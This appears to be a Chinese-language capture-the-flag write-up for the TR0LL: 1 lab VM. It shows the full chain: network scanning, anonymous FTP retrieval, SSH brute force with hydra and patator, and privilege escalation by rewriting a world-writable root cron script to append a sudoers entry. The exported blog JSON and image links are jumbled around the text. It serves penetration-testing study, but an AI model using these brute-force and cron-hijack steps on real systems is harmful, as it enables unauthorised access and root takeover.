![\"image-20240314122855778\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141427378.png\")
<\/div><\/p>\n\u5c1d\u8bd5\u626b\u63cf\u4e00\u4e0b\uff1a<\/p>\n
Starting arp-scan 1.10.0 with 256 hosts (https:\/\/github.com\/royhills\/arp-scan)\n10.161.61.1 00:50:56:c0:00:08 (Unknown)\n10.161.61.2 00:50:56:f8:9d:56 (Unknown)\n10.161.61.132 00:0c:29:7f:02:cf (Unknown)\n10.161.61.254 00:50:56:e4:42:fb (Unknown)\n\n4 packets received by filter, 0 packets dropped by kernel\nEnding arp-scan 1.10.0: 256 hosts scanned in 2.113 seconds (121.15 hosts\/sec). 4 responded<\/code><\/pre>\n\u626b\u51fa\u6765\u4e86\uff0c\u5f00\u59cb\u8fdb\u884c\u653b\u51fb\uff01<\/p>\n
\u4fe1\u606f\u641c\u96c6<\/h2>\nrustscan -a 10.161.61.132 -- -A -sV -Pn<\/code><\/pre>\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nReal hackers hack time \u231b\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 10.161.61.132:21\nOpen 10.161.61.132:22\nOpen 10.161.61.132:80\n[~] Starting Script(s)\n[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")\n\nHost discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.\n[~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-03-14 00:35 EDT\nNSE: Loaded 156 scripts for scanning.\nNSE: Script Pre-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 00:35\nCompleted NSE at 00:35, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 00:35\nCompleted NSE at 00:35, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 00:35\nCompleted NSE at 00:35, 0.00s elapsed\nInitiating Parallel DNS resolution of 1 host. at 00:35\nCompleted Parallel DNS resolution of 1 host. at 00:35, 0.02s elapsed\nDNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]\nInitiating Connect Scan at 00:35\nScanning 10.161.61.132 [3 ports]\nDiscovered open port 21\/tcp on 10.161.61.132\nDiscovered open port 22\/tcp on 10.161.61.132\nDiscovered open port 80\/tcp on 10.161.61.132\nCompleted Connect Scan at 00:35, 0.00s elapsed (3 total ports)\nInitiating Service scan at 00:35\nScanning 3 services on 10.161.61.132\nCompleted Service scan at 00:35, 6.05s elapsed (3 services on 1 host)\nNSE: Script scanning 10.161.61.132.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 00:35\nNSE: [ftp-bounce 10.161.61.132:21] PORT response: 500 Illegal PORT command.\nCompleted NSE at 00:35, 0.53s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 00:35\nCompleted NSE at 00:35, 0.02s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 00:35\nCompleted NSE at 00:35, 0.00s elapsed\nNmap scan report for 10.161.61.132\nHost is up, received user-set (0.00093s latency).\nScanned at 2024-03-14 00:35:22 EDT for 7s\n\nPORT STATE SERVICE REASON VERSION\n21\/tcp open ftp syn-ack vsftpd 3.0.2\n| ftp-syst: \n| STAT: \n| FTP server status:\n| Connected to 10.161.61.130\n| Logged in as ftp\n| TYPE: ASCII\n| No session bandwidth limit\n| Session timeout in seconds is 600\n| Control connection is plain text\n| Data connections will be plain text\n| At session startup, client count was 3\n| vsFTPd 3.0.2 - secure, fast, stable\n|_End of status\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n|_-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap [NSE: writeable]\n22\/tcp open ssh syn-ack OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n| 1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)\n| ssh-dss AAAAB3NzaC1kc3MAAACBAPvm+E+qXyRODHZMbgiT5buFG3ibhNm4hBA3oWrF0kIpePfc0uQZIPUpUZG6EEGQjbeXhyMFPQu4P9s6QwJJ4f31K+U+dLmMfOJNaIVdx9MpX04xuy7mxDp7h9XDJPiIcgLvMYItY52kgxZAuFbjsYdyBBT48Umyd6hhCpwq1\/0rAAAAFQDFm+k8NFmBftv1yK4U7dkg8ERgVwAAAIEAzzz\/FseGlWcEZrnlJSMoyKRa\/Dph5uIYpYqLu1OfZLhPKnELg9l5w6Gct9D+5SrFnm5lX6IcHWhG\/4ionh9qQO\/IJtuuSia9nVHruLvYipqiyULQ\/HO69Znv7hGmsWAsQa3MlX7nyo\/0MSgmVIJraSUBBNBzLCgU5oLn0xxNirwAAACARTIMgZBYWhbs2aZeqfq4HjUzH1nUB+\/bvyJ4cmbc3s8VfZhXRUggjDiz3f3spROVZEKwBKLUSM\/lGIDd9LfUjtjdoKdYN1HDEUwiKl2OlbmnhNX88NCF1QN66XTYKq0CThJYinBMIZi8FiW4DYZ9QT+9SZDib6hEvab\/E7YJ9zY=\n| 2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDi1MPWZMtN3eywmC1nj8ZOZsCv7j78Do5ebJiFEhwXDszJtWgzp\/Tb9H\/VidiUAdlnzNNZoq6KSBqETX1SxaHyl+d28gHR0A7Y1U0BtkMjTQsqo+Ocpc1cUSdAZTGz8i7t\/segL8ouF7agOjr0x97R5Hw1BSYuK3u51qgCothfrKJFrtt4mPryqx6Q2+ZV5h3dOaMExprApTMCjj2WtKwJn5xZsmKJ5c8sVnsbQaNKo1M7IH2WJkV89jO90EMZ6XJsTlbobWN8pASn7N05rjvI\/njinfI8cUq9HdSjYjaM4Lq4ZpReNXQ3bf7da0nRRGv2tSaVGU7OhcpNYIpo7Xcv\n| 256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBE+5luyzp+tLU9TK+5Avd2IA+8LEBFPxjUavwPVbeLdBhgF\/pTThnzpQ2hEhcUzWq2CfQPkg6q4H4F9k9Tpeg+k=\n| 256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIJZC+1mSO4wMlWhDBBwmHKkCob1KrCwkoqIvi9Bw+44\n80\/tcp open http syn-ack Apache httpd 2.4.7 ((Ubuntu))\n|_http-title: Site doesn't have a title (text\/html).\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\n| http-robots.txt: 1 disallowed entry \n|_\/secret\n|_http-server-header: Apache\/2.4.7 (Ubuntu)\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 00:35\nCompleted NSE at 00:35, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 00:35\nCompleted NSE at 00:35, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 00:35\nCompleted NSE at 00:35, 0.00s elapsed\nRead data files from: \/usr\/bin\/..\/share\/nmap\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 7.62 seconds\n<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h2>\n
\u5f00\u542f\u4e8680\u7aef\u53e3\uff0c\u5c1d\u8bd5\u76ee\u5f55\u626b\u63cf\uff1a<\/p>\n
![\"image-20240314123711634\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\ngobuster dir -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -u http:\/\/10.161.61.132 -f -t 200<\/code><\/pre>\n\/icons\/ (Status: 403) [Size: 286]\n\/secret\/ (Status: 200) [Size: 37]\n\/server-status\/ (Status: 403) [Size: 294]<\/code><\/pre>\n\u6f0f\u6d1e\u5229\u7528<\/h2>\n\u654f\u611f\u76ee\u5f55\u5206\u6790<\/h3>\n
<\/div><\/p>\n\u770b\u4e00\u4e0b\/secret<\/code>\uff1a<\/p>\n<\/div><\/p>\n\u7b49\u4e0b\u505a\u4e0d\u51fa\u6765\uff0c\u53ef\u4ee5\u5c1d\u8bd5\u4e0b\u8f7d\u4e00\u4e0b\u6587\u4ef6\u5206\u6790\u662f\u5426\u6709\u5305\u542b\u3002<\/p>\n
FTP\u8fde\u63a5<\/h3>\nftp 10.161.61.132<\/code><\/pre>\n\u663e\u793a\u9700\u8981\u9a8c\u8bc1\uff0c\u770b\u770b\u524d\u9762\u7684nmap<\/code>\u626b\u63cf\u7ed3\u679c\uff1a<\/p>\nftp-anon: Anonymous FTP login allowed (FTP code 230)<\/code><\/pre>\n\u5c1d\u8bd5\u767b\u5f55\uff1a<\/p>\n
Connected to 10.161.61.132.\n220 (vsFTPd 3.0.2)\nName (10.161.61.132:kali): Anonymous\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> dir\n229 Entering Extended Passive Mode (|||13804|).\n150 Here comes the directory listing.\n-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap\n226 Directory send OK.\nftp> get lol.pcap\nlocal: lol.pcap remote: lol.pcap\n229 Entering Extended Passive Mode (|||29147|).\n150 Opening BINARY mode data connection for lol.pcap (8068 bytes).\n100% |***********************************************************************************************| 8068 4.41 MiB\/s 00:00 ETA\n226 Transfer complete.\n8068 bytes received in 00:00 (2.96 MiB\/s)\nftp> exit\n221 Goodbye.<\/code><\/pre>\nwireshark\u5206\u6790<\/h3>\n
\u6253\u5f00wireshark<\/code>\u5206\u6790\u4e00\u4e0b\uff0c\u8ffd\u8e2aTCP\u6d41\uff1a<\/p>\n<\/div><\/p>\n\u8fd8\u53d1\u73b0\u4e86\uff1a<\/p>\n
<\/div><\/p>\n\u654f\u611f\u76ee\u5f55\u8bbf\u95ee<\/h3>\n
\u5c1d\u8bd5\u4e00\u4e0b\uff0c\u627e\u5230\u7684\u4e24\u4e2a\u6587\u4ef6\uff0c\u770b\u770b\u80fd\u4e0d\u80fd\u8bbf\u95ee\u5230\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\n\u67e5\u770b\u4e0b\u8f7d\u6587\u4ef6<\/h3>\n
<\/div><\/p>\n\u67e5\u770b\u4e00\u4e0b\u5b57\u7b26\u4e32\uff1a<\/p>\n
strings roflmao<\/code><\/pre>\n\/lib\/ld-linux.so.2\nlibc.so.6\n_IO_stdin_used\nprintf\n__libc_start_main\n__gmon_start__\nGLIBC_2.0\nPTRh\n[^_]\nFind address 0x0856BF to proceed \/\/\u7591\u4f3c\u654f\u611f\u5730\u5740\uff01\n;*2$"\nGCC: (Ubuntu 4.8.2-19ubuntu1) 4.8.2\n.symtab\n.strtab\n.shstrtab\n.interp\n.note.ABI-tag\n.note.gnu.build-id\n.gnu.hash\n.dynsym\n.dynstr\n.gnu.version\n.gnu.version_r\n.rel.dyn\n.rel.plt\n.init\n.text\n.fini\n.rodata\n.eh_frame_hdr\n.eh_frame\n.init_array\n.fini_array\n.jcr\n.dynamic\n.got\n.got.plt\n.data\n.bss\n.comment\ncrtstuff.c\n__JCR_LIST__\nderegister_tm_clones\nregister_tm_clones\n__do_global_dtors_aux\ncompleted.6590\n__do_global_dtors_aux_fini_array_entry\nframe_dummy\n__frame_dummy_init_array_entry\nroflmao.c\n__FRAME_END__\n__JCR_END__\n__init_array_end\n_DYNAMIC\n__init_array_start\n_GLOBAL_OFFSET_TABLE_\n__libc_csu_fini\n_ITM_deregisterTMCloneTable\n__x86.get_pc_thunk.bx\ndata_start\nprintf@@GLIBC_2.0\n_edata\n_fini\n__data_start\n__gmon_start__\n__dso_handle\n_IO_stdin_used\n__libc_start_main@@GLIBC_2.0\n__libc_csu_init\n_end\n_start\n_fp_hw\n__bss_start\nmain\n_Jv_RegisterClasses\n__TMC_END__\n_ITM_registerTMCloneTable\n_init<\/code><\/pre>\n\u8bbf\u95ee\u4e00\u4e0b\u5730\u57400x0856BF<\/code>\uff1a<\/p>\n<\/div><\/p>\n\u67e5\u770b\u4e00\u4e0b\u76f8\u5173\u4fe1\u606f\uff1a<\/p>\n
<\/div><\/p>\n\/\/which_one_lol.txt \nmaleus\nps-aux\nfelux\nEagle11\ngenphlux < -- Definitely not this one\nusmc8892\nblawrg\nwytshadow\nvis1t0r\noverflow<\/code><\/pre>\n<\/div><\/p>\n\/\/Pass.txt\nGood_job_:)<\/code><\/pre>\n\u4e5d\u5934\u86c7\u7206\u7834<\/h3>\nhydra -l which_one_lol.txt -P Pass.txt -t 6 -s 20000 ssh:\/\/10.161.61.132<\/code><\/pre>\n\u672a\u7206\u7834\u51fa\u6765\uff0c\u4f46\u662f\u7a33\u4f4f\uff01\u5c1d\u8bd5\u6362\u4e00\u4e2a\u5de5\u5177\uff0chydra\u4e0d\u4e89\u6c14\u597d\u51e0\u6b21\u4e86\uff0c\u5bb3\u3002<\/p>\n
patator ssh_login host=10.161.61.132 user=FILE0 0=which_one_lol.txt password=Pass.txt<\/code><\/pre>\n01:37:03 patator INFO - Starting Patator 1.0 (https:\/\/github.com\/lanjelot\/patator) with python-3.11.7 at 2024-03-14 01:37 EDT\n01:37:03 patator INFO - \n01:37:03 patator INFO - code size time | candidate | num | mesg\n01:37:03 patator INFO - -----------------------------------------------------------------------------\n01:37:05 patator INFO - 1 22 2.046 | ps-aux | 2 | Authentication failed.\n01:37:05 patator INFO - 1 22 2.034 | felux | 3 | Authentication failed.\n01:37:05 patator INFO - 1 22 2.044 | Eagle11 | 4 | Authentication failed.\n01:37:05 patator INFO - 1 22 2.044 | blawrg | 7 | Authentication failed.\n01:37:05 patator INFO - 1 22 2.036 | wytshadow | 8 | Authentication failed.\n01:37:05 patator INFO - 1 22 2.020 | vis1t0r | 9 | Authentication failed.\n01:37:05 patator INFO - 0 39 2.069 | overflow | 10 | SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2\n01:37:07 patator INFO - 1 22 3.928 | maleus | 1 | Authentication failed.\n01:37:07 patator INFO - 1 22 3.878 | genphlux < -- Definitely not this one | 5 | Authentication failed.\n01:37:07 patator INFO - 1 22 3.927 | usmc8892 | 6 | Authentication failed.\n01:37:08 patator INFO - Hits\/Done\/Skip\/Fail\/Size: 10\/10\/0\/0\/10, Avg: 2 r\/s, Time: 0h 0m 4s<\/code><\/pre>\n\u770b\u6765overflow<\/code>\u662f\u4e00\u4e2a\u53ef\u884c\u7684\u7528\u6237\u3002<\/p>\nssh\u8fde\u63a5<\/h3>\nssh overflow@10.161.61.132\npassword:Good_job_:)<\/code><\/pre>\n\u4e0d\u6b63\u786e\uff1f\uff1f\uff1f\uff1fwtm\uff01\u96be\u9053\u7528\u6237\u540d\u4e5f\u662f\u5bc6\u7801\uff1f\u7206\u7834\u4e00\u4e0b\u8bd5\u8bd5\uff1a<\/p>\n
hydra -s 22 -v -V -l overflow -P which_one_lol.txt -e n -t 1 -w 30 10.161.61.132 ssh<\/code><\/pre>\n[ATTEMPT] target 10.161.61.132 - login "overflow" - pass "" - 1 of 11 [child 0] (0\/0)\n[ATTEMPT] target 10.161.61.132 - login "overflow" - pass "maleus" - 2 of 11 [child 0] (0\/0)\n[ATTEMPT] target 10.161.61.132 - login "overflow" - pass "ps-aux" - 3 of 11 [child 0] (0\/0)\n[ATTEMPT] target 10.161.61.132 - login "overflow" - pass "felux" - 4 of 11 [child 0] (0\/0)\n[ATTEMPT] target 10.161.61.132 - login "overflow" - pass "Eagle11" - 5 of 11 [child 0] (0\/0)\n[ATTEMPT] target 10.161.61.132 - login "overflow" - pass "genphlux < -- Definitely not this one" - 6 of 11 [child 0] (0\/0)\n[ATTEMPT] target 10.161.61.132 - login "overflow" - pass "usmc8892" - 7 of 11 [child 0] (0\/0)\n[ATTEMPT] target 10.161.61.132 - login "overflow" - pass "blawrg" - 8 of 11 [child 0] (0\/0)\n[STATUS] 8.00 tries\/min, 8 tries in 00:01h, 3 to do in 00:01h, 1 active\n[ATTEMPT] target 10.161.61.132 - login "overflow" - pass "wytshadow" - 9 of 11 [child 0] (0\/0)\n[ATTEMPT] target 10.161.61.132 - login "overflow" - pass "vis1t0r" - 10 of 11 [child 0] (0\/0)\n[STATUS] 5.00 tries\/min, 10 tries in 00:02h, 1 to do in 00:01h, 1 active\n[ATTEMPT] target 10.161.61.132 - login "overflow" - pass "overflow" - 11 of 11 [child 0] (0\/0)\n[STATUS] attack finished for 10.161.61.132 (waiting for children to complete tests)\n1 of 1 target completed, 0 valid password found<\/code><\/pre>\ngenphlux<\/code>\u6ca1\u6709\u8bd5\uff0c\u8bd5\u4e00\u4e0b\u3002\u3002\u3002\u3002\u9519\u7684\u3002\u3002\u3002\u3002<\/p>\n\u518d\u627e\u4e00\u4e0b\u662f\u5426\u6709\u9057\u6f0f\u7684\u4fe1\u606f\uff1a<\/p>\n
\u4f5c\u8005\u63d0\u793a\u4e86this_folder_contains_the_password\/<\/code>\u8bf4\u660e\u8fd9\u4e2a\u6587\u4ef6\u5939\u4e0b\u662f\u6709\u6b63\u786e\u7684\u5bc6\u7801\u7684\uff01\u628a\u8fd9\u4e2a\u6587\u4ef6\u540d\u548cPass.txt<\/code>\u653e\u5165\u4e00\u4e2a\u6587\u4ef6\uff0c\u518d\u6b21\u7206\u7834\u3002<\/p>\n<\/div><\/p>\n\u5636\u3002\u3002\u3002\u3002\u62ff\u4e0b\uff01\uff01<\/p>\n
\u8fde\u63a5\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp]\n\u2514\u2500$ ssh overflow@10.161.61.132\noverflow@10.161.61.132's password: \nWelcome to Ubuntu 14.04.1 LTS (GNU\/Linux 3.13.0-32-generic i686)\n\n * Documentation: https:\/\/help.ubuntu.com\/\nNew release '16.04.7 LTS' available.\nRun 'do-release-upgrade' to upgrade to it.\n\nThe programs included with the Ubuntu system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nUbuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by\napplicable law.\n\nThe programs included with the Ubuntu system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nUbuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by\napplicable law.\n\nLast login: Wed Aug 13 01:14:09 2014 from 10.0.0.12\nCould not chdir to home directory \/home\/overflow: No such file or directory<\/code><\/pre>\n\u63d0\u6743<\/h2>\n
\u8fd9\u79cd\u673a\u5b50\u6bd4\u8f83\u8001\u4e86\uff0c\u5c31\u4e0d\u5c1d\u8bd5\u5185\u6838\u6f0f\u6d1e\u4e86\uff0c\u770b\u770b\u6709\u6ca1\u6709\u522b\u7684\u601d\u8def\uff1a<\/p>\n
\u67e5\u770b\u4e00\u4e0bsuid<\/h3>\nfind \/ -perm -u=s -type f 2>\/dev\/null<\/code><\/pre>\n\/usr\/sbin\/uuidd\n\/usr\/sbin\/pppd\n\/usr\/bin\/chfn\n\/usr\/bin\/sudo\n\/usr\/bin\/passwd\n\/usr\/bin\/traceroute6.iputils\n\/usr\/bin\/mtr\n\/usr\/bin\/chsh\n\/usr\/bin\/newgrp\n\/usr\/bin\/gpasswd\n\/usr\/lib\/pt_chown\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/vmware-tools\/bin64\/vmware-user-suid-wrapper\n\/usr\/lib\/vmware-tools\/bin32\/vmware-user-suid-wrapper\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/bin\/su\n\/bin\/ping\n\/bin\/fusermount\n\/bin\/ping6\n\/bin\/mount\n\/bin\/umount<\/code><\/pre>\n\u4f3c\u4e4e\u6ca1\u6709\u6211\u4eec\u53ef\u4ee5\u76f4\u63a5\u5229\u7528\u7684\u3002<\/p>\n
\u67e5\u770b\u5b9a\u65f6\u4efb\u52a1<\/h3>\ncrontab -l\nls -alh \/var\/spool\/cron\ncat \/var\/spool\/cron\/crontabs\/root<\/code><\/pre>\n\u4e00\u65e0\u6240\u83b7\u3002\u3002<\/p>\n
\u67e5\u770b\u4e00\u4e0b\u5e38\u89c1\u76ee\u5f55\uff0c\u770b\u770b\u6709\u6ca1\u6709\u6536\u83b7\uff0c\u6ca1\u6709\u4ec0\u4e48\u53d1\u73b0\uff0c\u5728\u6211\u53d1\u5446\u7684\u65f6\u5019\u7a81\u7136\u5f39\u51fa\u6765\u8fd9\u4e2a\u4e2a\u7b49\u4e0b\uff1a<\/p>\n
Broadcast Message from root@trol \n (somewhere) at 22:50 ... \n\nTIMES UP LOL! \n\nConnection to 10.161.61.132 closed by remote host.\nConnection to 10.161.61.132 closed.<\/code><\/pre>\n\u5636\u3002\u3002\u3002\u3002\u770b\u6765\u8fd8\u662f\u6709\u5b9a\u65f6\u4efb\u52a1\u7684\uff0c\u6de6\uff01<\/p>\n
\u67e5\u770b\u4e00\u4e0b\u65e5\u5fd7\uff1a<\/p>\n
<\/div><\/p>\n\u627e\u5230\u5143\u51f6\u4e86\uff01\uff01\uff012\u5206\u949f\u8fd0\u884c\u4e00\u6b21\u7684\u5b9a\u65f6\u4efb\u52a1\uff01<\/p>\n
\u5148\u627e\u4e00\u4e0b\u4f4d\u7f6e\uff1a<\/p>\n
find \/ -name cleaner.py 2>\/dev\/null | grep "cleaner.py"\n# \/lib\/log\/cleaner.py<\/code><\/pre>\n# \/lib\/log\/cleaner.py\n#!\/usr\/bin\/env python\nimport os\nimport sys\ntry:\n os.system('rm -r \/tmp\/* ')\nexcept:\n sys.exit()<\/code><\/pre>\n\u67e5\u770b\u4e00\u4e0b\u8fd9\u4e2a\u6587\u4ef6\u7684\u6743\u9650\uff1a<\/p>\n
$ ls -l \/lib\/log\/cleaner.py\n-rwxrwxrwx 1 root root 96 Aug 13 2014 \/lib\/log\/cleaner.py<\/code><\/pre>\n\u597d\u6837\u7684\uff0c\u5199\u4e00\u4e0b\uff0c\u6539\u4e3a\uff1a<\/p>\n
#!\/usr\/bin\/env python\nimport os\nimport sys\ntry:\n os.system('echo "overflow ALL=(ALL:ALL) ALL" >> \/etc\/sudoers')\nexcept:\n sys.exit()<\/code><\/pre>\n\u7f16\u8f91\u7684\u65f6\u5019\u663e\u793a\u6709swap<\/code>\u6587\u4ef6\u5b58\u5728\uff0c\u7ed9\u5b83\u5220\u6389\u5c31\u884c\u4e86\uff0cvim<\/code>\u7f16\u8f91\u540ewq!<\/code>\u5f3a\u5236\u4fdd\u5b58\u9000\u51fa\uff0c\u7b49\u5f85\u628a\u6211\u4eec\u8e22\u51fa\u53bb\uff0c\u518d\u91cd\u65b0\u8fdb\u5373\u53ef\uff1a<\/p>\n<\/div><\/p>\n\u524d\u9762\u5fd8\u8bb0\u52a0\u58f0\u660e\u4e86\uff0c\u52a0\u4e00\u4e0b\uff1a<\/p>\n
<\/div><\/p>\n\u7136\u540e\u5373\u53ef\u83b7\u53d6\u5230\u4e86root\uff0c\u770b\u4f3c\u4e0d\u662froot\u5176\u5b9e\u6743\u9650\u5df2\u7ecf\u548croot\u4e00\u6837\u4e86\uff01\uff01<\/p>\n
<\/div><\/p>\n\u6700\u540e\u6210\u529f\u83b7\u53d6flag\uff01\uff01\uff01\uff01<\/p>\n
\u8865\u5145<\/h4>\n
\u80fd\u5199python\u6587\u4ef6\u4ee3\u8868\u7740\u751a\u81f3\u53ef\u4ee5\u76f4\u63a5\u8bfb\u53d6flag\uff0c\u6216\u8005\u5c06ssh\u516c\u94a5\u4e22\u8fdb\u53bb\u4e5f\u53ef\u4ee5\uff01\uff01\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"
TR0LL: 1 \u5c1d\u8bd5\u626b\u63cf\u4e00\u4e0b\uff1a Starting arp-scan 1.10.0 with 256 host […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24],"tags":[],"class_list":["post-389","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/389","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=389"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/389\/revisions"}],"predecessor-version":[{"id":390,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/389\/revisions\/390"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=389"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=389"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=389"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"image-20240314123711634\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141427380.png\")
<\/div><\/p>\n![\"image-20240314124728567\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141427381.png\")
<\/div><\/p>\n![\"image-20240314124352690\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141427382.png\")
<\/div><\/p>\n![\"image-20240314125223581\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141427383.png\")
<\/div><\/p>\n![\"image-20240314125642918\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141427384.png\")
<\/div><\/p>\n![\"image-20240314125841639\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141427385.png\")
<\/div>![\"image-20240314130000535\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141427386.png\")
<\/div><\/p>\n![\"image-20240314130116427\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141427387.png\")
<\/div><\/p>\n![\"image-20240314130320440\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141427388.png\")
<\/div><\/p>\n![\"image-20240314130400127\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141427389.png\")
<\/div><\/p>\n![\"image-20240314132501149\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141427390.png\")
<\/div><\/p>\n![\"image-20240314134943698\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141427391.png\")
<\/div><\/p>\n![\"image-20240314140157807\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141427392.png\")
<\/div><\/p>\n![\"image-20240314141741968\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141427393.png\")
<\/div><\/p>\n![\"image-20240314142310714\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141427394.png\")
<\/div><\/p>\n![\"image-20240314142646737\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403141427395.png\")
<\/div><\/p>\n